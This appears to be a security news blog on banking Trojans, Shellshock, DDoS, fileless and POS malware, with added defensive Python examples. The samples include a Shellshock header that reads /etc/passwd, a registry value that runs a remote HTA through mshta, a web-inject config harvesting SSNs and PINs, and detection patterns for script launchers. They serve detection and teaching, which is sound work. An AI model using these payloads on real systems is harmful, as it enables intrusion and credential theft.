Internet threat news
Recently, attackers released a variant of the Dyre banking Trojan aimed at users of Salesforce.com, the widely used customer relationship management platform. In early September, Salesforce notified customers that they might be targeted by Dyre (also known as Dyreza), a Trojan that harvests login credentials as the victim signs in from an infected machine. Traditional Dyre campaigns target customers of large financial institutions; the variant affecting Salesforce customers arrived as an email attachment that installed Dyre once opened.
Russian hackers tracked as the “Sandworm team” are targeting government leaders and institutions including the North Atlantic Treaty Organization (NATO), the European Union, the Ukrainian government and academic targets in the United States. At least one U.S. academic was singled out for his work on Ukrainian issues. According to recent analysis by security firm iSight, which has been watching Sandworm since last year, this cyber espionage campaign has been compromising Windows computers for over five years, extracting information on intelligence and diplomatic affairs in Ukraine.
Security experts recently uncovered a large and extremely dangerous botnet that has already infected an estimated 500,000 computers worldwide. Known as Qbot or Qakbot, the botnet sniffs the victim's network traffic for online banking sessions. At the time of this writing, over 800,000 unique online financial transactions have been intercepted. Most involve customers of at least five major United States banks, although security firm Proofpoint (which discovered this campaign) states that many large European banks are also being actively targeted. According to reports, the campaign began when a group of Russian cybercriminals bought administrative login credentials for WordPress sites on an underground marketplace. Malware was uploaded to these sites so that visitors became victims of the ever-popular drive-by download.
You may have heard about a recent security scare that many websites have been quick to compare to Heartbleed and other serious vulnerabilities discovered this year. In case you are unfamiliar, Shellshock is a vulnerability in Bash, the default command shell on most Linux/Unix systems and on OS X (Apple) computers, that can let an attacker execute commands remotely. The flaw is a parsing oversight: when Bash starts, it imports function definitions from environment variables, and a vulnerable version also executes any command appended after the function body. Anything that copies untrusted input into an environment variable and then runs Bash (CGI web scripts are the classic case, since the web server places request headers in variables such as HTTP_USER_AGENT) therefore becomes a remote code execution path. Although the use of Linux on home computers is still relatively limited, Shellshock could spell big trouble for many large corporations that rely on Linux or Unix-based systems for backend functions. This blog decided not to cover Shellshock previously because it does not affect Windows machines. However, security researchers have since reported that the Windows command shell has similar weaknesses that could allow remote code execution.
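To make the mechanism concrete, here is an added example (not code from the original post or from any of the researchers it cites). It shows the two halves of a Shellshock attack: how a CGI server turns an HTTP header into an environment variable, and the classic local probe that sends Bash an environment variable holding a function definition with a trailing command. The header names, the helper names and the sample request are constructed for illustration.

```python
import os
import shutil
import subprocess

# Added example, not from the original post. Helper names are hypothetical.


def cgi_env_name(header_name):
    """Map an HTTP header name to the CGI meta-variable a web server sets for it
    (RFC 3875: upper-case, '-' becomes '_', prefixed with HTTP_)."""
    return "HTTP_" + header_name.strip().upper().replace("-", "_")


def is_function_import_payload(value):
    """A header value that begins with Bash's function-definition marker '() {'
    is the signature of a Shellshock probe; IDS rules of the time keyed on it."""
    return value.lstrip().startswith("() {")


def suspicious_headers(headers):
    """Return the CGI variable names that would carry an injected function."""
    return [cgi_env_name(h) for h, v in headers.items()
            if is_function_import_payload(v)]


def shellshock_status(bash_path=None):
    """Run the classic local test against the installed bash.
    Returns 'vulnerable', 'patched' or 'no-bash'."""
    bash = bash_path or shutil.which("bash")
    if not bash:
        return "no-bash"
    env = dict(os.environ)
    # Harmless function body followed by a trailing command. An unpatched bash
    # executes 'echo VULNERABLE' while importing the variable as a function.
    env["x"] = "() { :;}; echo VULNERABLE"
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.SubprocessError):
        return "no-bash"
    return "vulnerable" if "VULNERABLE" in out else "patched"


# Constructed request headers: what a scanner sends at a CGI endpoint.
SAMPLE_HEADERS = {
    "Host": "www.example.com",
    "User-Agent": "() { :; }; /bin/cat /etc/passwd",
}

if __name__ == "__main__":
    print("local bash:", shellshock_status())
    print("flagged CGI variables:", suspicious_headers(SAMPLE_HEADERS))
```

Run it on a host with a patched Bash and `shellshock_status()` reports `patched`; a pre-fix Bash prints `VULNERABLE` and the function returns `vulnerable`. The header check is the part worth keeping in a web-facing filter, since the same payload arrives in any header (or query string) the server exports to the environment, not only User-Agent.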
Police officers exist to protect us, right? So it shouldn’t come as much of a surprise when the local police department offers us, citizens of the United States, a tool designed to protect our children from the dangerous place colloquially known as the Internet. Unfortunately, it appears local police departments would rather follow in the footsteps of the NSA and spy on everything we do online, illicit or not. ComputerCOP is free Internet-monitoring software distributed by law enforcement agencies around the country. It is purportedly designed as a way for parents to keep an eye on what their children are doing online.
A Greek security researcher recently uncovered a new malware campaign that combines two well-known programs to avoid detection by most antivirus solutions while functioning as a keylogger capable of capturing every keystroke made on an infected machine. These keystrokes, which often include sensitive personal and financial data, are then sent discreetly to the cybercriminals behind the attack. The threat consists of two separate pieces of software. The first is a well-documented keylogging program known as Limitless Keylogger.
A Distributed Denial of Service (DDoS) attack is nothing new. The technique has been used by attackers since the early days of the public Internet and continues to be an effective way to disrupt network services. DDoS attacks have another purpose as well: they make a good smokescreen. The Gameover Zeus botnet was often installed on networks during massive DDoS attacks used to distract IT security personnel from the malware infection. By the time the DDoS attack subsided, Gameover was already installed, and it could be days before the breach was even noticed. Perhaps the biggest drawback (from the attacker's perspective) of a DDoS attack is that the most common techniques (SYN floods, User Datagram Protocol (UDP) floods and HTTP GET request floods) are extremely well documented and easy to block once a network is properly configured, for example with SYN cookies and per-source rate limits.
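As an added example (not code from the original post), the classifier below runs the well-documented signatures of those three flood types over a constructed set of packet summaries: many bare SYNs from many sources in one second, a burst of UDP to one destination, or a burst of HTTP GETs. The packet tuple layout, the thresholds and the addresses are assumptions made for illustration; a real deployment would take them from a capture or flow export and tune the thresholds to its baseline.

```python
from collections import Counter, defaultdict

# Added example, not from the original post. Thresholds are illustrative.
WINDOW_SECONDS = 1
THRESHOLDS = {"syn_flood": 50, "udp_flood": 50, "get_flood": 50}  # packets per window
MIN_DISTINCT_SOURCES = 10  # fewer sources than this is one noisy client, not a DDoS


def classify_flood(packets):
    """packets: iterable of (ts, src, dst, proto, tcp_flags, payload) tuples.
    Returns a sorted list of (kind, dst, packet_count, distinct_sources) for
    every one-second window in which a flood signature crosses its threshold."""
    counts = defaultdict(Counter)                  # kind -> Counter[(window, dst)]
    sources = defaultdict(lambda: defaultdict(set))  # kind -> {(window, dst): {src}}
    for ts, src, dst, proto, flags, payload in packets:
        window = (int(ts // WINDOW_SECONDS), dst)
        if proto == "tcp" and flags == "S":
            kind = "syn_flood"      # bare SYNs; a flood never completes the handshake
        elif proto == "udp":
            kind = "udp_flood"
        elif proto == "tcp" and payload.startswith(b"GET "):
            kind = "get_flood"
        else:
            continue
        counts[kind][window] += 1
        sources[kind][window].add(src)
    findings = []
    for kind, per_window in counts.items():
        for window, n in per_window.items():
            if n >= THRESHOLDS[kind] and len(sources[kind][window]) >= MIN_DISTINCT_SOURCES:
                findings.append((kind, window[1], n, len(sources[kind][window])))
    return sorted(findings)


def synth_traffic():
    """Constructed capture: one legitimate client plus two floods."""
    pkts = []
    # Legitimate client completing a handshake and fetching a page (window 5).
    pkts += [(5.1, "10.0.0.5", "203.0.113.10", "tcp", "S", b""),
             (5.2, "10.0.0.5", "203.0.113.10", "tcp", "A", b""),
             (5.3, "10.0.0.5", "203.0.113.10", "tcp", "PA", b"GET / HTTP/1.1\r\n")]
    # 200 spoofed SYNs from 200 sources inside one second (window 0).
    pkts += [(0.001 * i, f"198.51.100.{i}", "203.0.113.10", "tcp", "S", b"")
             for i in range(1, 201)]
    # 120 UDP packets at a DNS server from 12 reflectors (window 2).
    pkts += [(2.0 + 0.005 * i, f"192.0.2.{i % 12 + 1}", "203.0.113.53", "udp", "", b"\x00" * 64)
             for i in range(120)]
    return pkts


if __name__ == "__main__":
    for finding in classify_flood(synth_traffic()):
        print(finding)
```

The legitimate handshake in window 5 produces no finding because one SYN and one GET are far below threshold, which is the point of counting per window and per destination rather than alerting on flag patterns alone. The SYN check here is deliberately simple; a production version also confirms that the SYNs are never followed by an ACK from the same source, since that half-open state is what exhausts the listener.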
As more devices become Internet-ready, luring consumers with the dream of an automated lifestyle, new malware is being designed to take advantage of this trend. Smart thermostats and other appliances have even been used in large-scale Distributed Denial of Service (DDoS) attacks. In fact, one such attack was recently recorded at 215 Gbps and over 150 million packets per second. This DDoS attack was performed using a new malware toolkit known as Spike. Security experts have watched the Spike toolkit being ported from Windows to Linux and even to ARM-based platforms, which is what lets it run on the embedded devices inside such appliances.
Twitch is a popular video game streaming site recently acquired by Amazon. According to Finnish security firm F-Secure, a rogue Twitch account is being used to run a malware campaign against users of Steam, a popular game distribution platform. The malware, called Eskimo, spreads by sending automated spam messages from the Twitch account through the service's built-in chat. Recipients are asked to click a link that supposedly enters them in a raffle for sought-after items in Counter-Strike: Global Offensive, a popular game distributed through Steam.
A banking Trojan known as Tiny Banker, or Tinba, was first discovered over two years ago when it infected thousands of computers in Turkey. The malware is extremely small at only 20 KB (hence the name) and injects rogue HTML fields into the pages of online banking sites it recognizes the victim visiting. The injected fields typically ask for sensitive personal and financial information that genuine online banking portals do not normally ask for, which is the tell-tale sign of a web inject. Recently, antivirus and security company Avast analyzed a new version of Tiny Banker that appears to target customers in the United States. Specifically, Tinba is now programmed to target major U.S. banks including Wells Fargo and Bank of America.
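The following is an added example, not Tinba's code and not part of Avast's analysis. It shows what a web inject does to a login form and the simple integrity check a bank (or a proxy that sees the rendered page) can run against it: collect the form fields actually present and compare them with the fields the server's template is known to contain. The login form, the inject and the `data_before`/`data_inject`/`data_after` layout (the convention used by Zeus-family inject configs, assumed here for illustration) are all constructed.

```python
from html.parser import HTMLParser

# Added example, not from the original post. Page and inject are constructed.
CLEAN_LOGIN_PAGE = """<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>"""

# The Trojan rewrites the page inside the browser, after TLS has been
# stripped, so the bank's server only sees the extra fields when the victim
# submits them.
INJECT = {
    "url_mask": "*bank.example/login*",
    "data_before": '<input type="password" name="password">',
    "data_inject": '\n  <input type="text" name="ssn" placeholder="Social Security Number">'
                   '\n  <input type="password" name="atm_pin" placeholder="ATM PIN">',
    "data_after": '<input type="submit"',
}


def apply_inject(html, inject):
    """Insert data_inject right after data_before, provided data_after follows.
    Returns the page unchanged when the anchors are not found."""
    start = html.find(inject["data_before"])
    if start == -1:
        return html
    start += len(inject["data_before"])
    if html.find(inject["data_after"], start) == -1:
        return html
    return html[:start] + inject["data_inject"] + html[start:]


class FieldCollector(HTMLParser):
    """Collect the names of user-input fields in document order."""

    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag in ("input", "select", "textarea"):
            a = dict(attrs)
            if a.get("type") != "submit" and a.get("name"):
                self.fields.append(a["name"])


def form_fields(html):
    parser = FieldCollector()
    parser.feed(html)
    return parser.fields


def unexpected_fields(observed_html, expected_fields):
    """Fields present in the page the user sees that the template never had."""
    return sorted(set(form_fields(observed_html)) - set(expected_fields))


if __name__ == "__main__":
    tampered = apply_inject(CLEAN_LOGIN_PAGE, INJECT)
    print("extra fields:", unexpected_fields(tampered, form_fields(CLEAN_LOGIN_PAGE)))
```

Note the limits of this check: the Trojan controls the browser, so a script that reports field names back to the bank can itself be tampered with. It is still a useful signal, and a reminder to users that a login page asking for a Social Security number or ATM PIN is not the bank's page.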
A couple of months ago this blog reported that the Gameover Zeus botnet, a notoriously dangerous Trojan also responsible for distributing Cryptolocker ransomware, was shut down by an international task force code-named Operation Tovar. This task force included the U.S. Department of Justice, multiple law enforcement agencies, foreign government agencies and private security firms from around the world. The goal was to take down the command and control servers that sent instructions to millions of infected PCs, and for the most part the operation was considered a success.
Recently, this blog covered the alarming increase in fileless malware such as Poweliks. This dangerous type of malware evades most modern antivirus solutions because it never writes an executable to the hard drive (a new file on disk is the main trigger for file-based scanning). Fileless malware isn’t exactly new, but the attacker's problem has always been that memory-only malware disappears when the computer is rebooted. Newer variants like Poweliks solve this by loading themselves from registry entries every time the machine boots, producing persistent fileless malware that is very hard to detect and just as difficult to remove.
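Because the persistence lives in the registry rather than on disk, the place to look for it is the autostart keys. The script below is an added example (not Poweliks code and not from the original post) that scans a `.reg` export of the Run keys and flags values whose command line hands control to a script host rather than to a program file: the `rundll32.exe javascript:` launcher Poweliks is known for, `mshta`, encoded PowerShell, or `regsvr32` loading a scriptlet. The export text, the value names and the patterns are constructed for illustration and are an assumption, not a vendor signature set.

```python
import re

# Added example, not from the original post. Sample export is constructed; on a
# real host produce one with:  reg export HKCU\...\CurrentVersion\Run run.reg
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"a"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"<script>alert(1)</script>\")"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="mshta.exe http://203.0.113.7/u.hta"
'''

KEY_LINE = re.compile(r"^\[(.+)\]$")
RUN_KEY = re.compile(r"\\(Run|RunOnce)$", re.I)
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')

# Launchers that execute script instead of a file on disk (illustrative set).
LAUNCHERS = [
    ("rundll32 javascript: launcher", re.compile(r"rundll32(\.exe)?\s+javascript:", re.I)),
    ("mshta launcher", re.compile(r"\bmshta(\.exe)?\b", re.I)),
    ("powershell encoded command", re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("regsvr32 scriptlet", re.compile(r"regsvr32(\.exe)?\b.*\bscrobj\.dll", re.I)),
]


def scan_reg_export(text):
    """Return (key, value_name, reason) for suspicious values under Run/RunOnce."""
    findings = []
    key = None
    for line in text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1) if RUN_KEY.search(m.group(1)) else None
            continue
        if key is None:
            continue
        m = VALUE_LINE.match(line)
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        for reason, pattern in LAUNCHERS:
            if pattern.search(data):
                findings.append((key, name, reason))
                break
        else:
            # A value name that regedit cannot display is itself a red flag.
            if not name or not name.isprintable():
                findings.append((key, name, "unprintable or empty value name"))
    return findings


if __name__ == "__main__":
    for key, name, reason in scan_reg_export(SAMPLE_REG):
        print(f"{key}\\{name}: {reason}")
```

The heuristic is deliberately about the launcher, not about file hashes: there is no file to hash. Whatever the script host is told to run (here an inline `document.write` stub standing in for the real encoded payload) is the thing to decode and examine next.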
Reveton is an infamous strain of ransomware, the increasingly popular class of malware that locks computers or encrypts valuable data to extort money from victims. Now that security researchers have found a way to decrypt files held by one of the most notorious ransomware variants to date (Cryptolocker), it seems that hackers haven’t wasted any time finding new ways to reuse old malware. Unlike Cryptolocker, the original version of Reveton simply locked a victim’s computer to a splash screen and demanded payment to unlock it. Recently, however, security professionals have identified a new version of Reveton bundled with two powerful password-stealing programs, making this variant even more dangerous than before.
Point-of-sale (POS) systems with credit card processing capabilities are everywhere, from the gas pump to the local convenience store to your favorite clothing boutique. Unfortunately, hackers have begun targeting these POS systems around the world with specialized malware designed to extract payment card data from thousands (and often millions) of people before the affected company even knows what happened. A recent Secret Service bulletin describes one of these malware variants, known as Backoff. The announcement states that at least seven POS vendors have confirmed having multiple clients affected by Backoff.
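POS malware of this kind, Backoff included, typically gets card data by scanning process memory for magnetic-stripe track data while it sits in the clear between the card reader and the payment application. The script below is an added example (not Backoff's code and not from the bulletin) of that same scan written from the defender's side: it finds Track 1 and Track 2 records in a buffer using the standard stripe layouts, discards lookalikes that fail the Luhn check, and masks the card number in its output. The buffer is a constructed stand-in for a memory dump and uses the public Visa test number 4111111111111111.

```python
import re

# Added example, not from the original post. Layouts follow ISO/IEC 7813:
# Track 1 = %B<PAN>^<NAME>^<YYMM>...?   Track 2 = ;<PAN>=<YYMM><service code>...?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^\^?]{2,26})\^(\d{4})\d*\?")
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})\d*\?")


def luhn_ok(pan):
    """Luhn checksum; card scrapers use it to drop digit runs that are not PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep the BIN and last four, the usual PCI-acceptable display form."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(buf):
    """Return (track, masked_pan, detail) for each Luhn-valid record in buf."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append(("track1", mask_pan(pan), m.group(2).decode("ascii", "replace")))
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append(("track2", mask_pan(pan), m.group(2).decode("ascii")))
    return hits


# Constructed memory fragment: application strings, both tracks of one test
# card, and a Track 2 lookalike whose PAN fails the Luhn check.
SAMPLE_MEMORY = (
    b"\x00" * 16 + b"POSApp.exe transaction log\x00"
    + b"%B4111111111111111^DOE/JOHN^25121011000000000?"
    + b"\x00" * 8
    + b";4111111111111111=25121011234567890?"
    + b";4111111111111112=25121011234567890?"
    + b"\x00" * 16
)

if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_MEMORY):
        print(hit)
```

Run over a real process dump or an exfiltration staging file, this is the check that tells you whether cleartext track data is reachable in memory at all; if it is, the scraper has something to take. The structural fix is point-to-point encryption at the reader, so the payment application never holds the stripe in the clear.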